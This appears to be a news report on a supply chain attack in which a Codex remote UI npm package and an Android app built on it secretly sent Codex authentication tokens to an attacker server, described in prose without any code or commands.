In a concerning development for technology enthusiasts and professionals, cybersecurity researchers have uncovered a sophisticated supply chain attack targeting developers utilizing OpenAI Codex. This attack, conducted through a seemingly legitimate remote web UI tool named codexui-android, has left many developers vulnerable to data breaches involving authentication tokens.
The Nature of the Attack
The tool, promoted on GitHub and npm, is designed as a remote interface for OpenAI Codex and has been downloaded over 29,000 times weekly. Unlike typical attacks that rely on deceptive package names, this malicious activity embeds harmful code within an actively developed and functional npm package, which remains accessible on the repository.
According to Aikido Security’s Charlie Eriksen, the attack involves surreptitious exfiltration of Codex authentication tokens to a server controlled by the attackers. The modified code was integrated into the package about a month after its initial publication, likely to gain user trust. The npm account linked to this package is attributed to an individual identified as Igor Levochkin.
Details of the Security Breach
Embedded within the package is code that extracts and transmits Codex’s authentication details to a remote server mimicking the legitimate Sentry platform. This data includes access tokens and other sensitive identifiers, posing significant security risks. Notably, the refresh token, which does not expire, allows attackers to impersonate users indefinitely.
OpenAI advises treating the local storage of these tokens with the same caution as passwords, warning against sharing or exposing them inadvertently. Aikido Security has also identified an Android app named OpenClaw Codex Claude AI Agent, which incorporates the same malicious npm package within its operations, further spreading the risk to mobile devices.
Response and Implications
The app, developed by an entity called BrutalStrike, has been downloaded over 50,000 times, with additional apps from the same developer displaying similar vulnerabilities. Efforts to contact the package author on GitHub resulted in claims of lost account access, followed by statements of internal investigation and removal of the malicious functions.
This incident is part of a broader trend where threat actors target AI development tools to infiltrate the software supply chain and steal credentials. It highlights the importance of vigilant security measures and rapid response to potential threats in the digital landscape.
In related news, a flaw in Google’s API key revocation process was recently discovered, where deleted keys remained active for 23 minutes, posing additional risks. This vulnerability underscores the ongoing challenges in securing cloud environments against unauthorized access.
The findings emphasize the critical need for improved security protocols and swift action to mitigate vulnerabilities in software development and deployment processes.
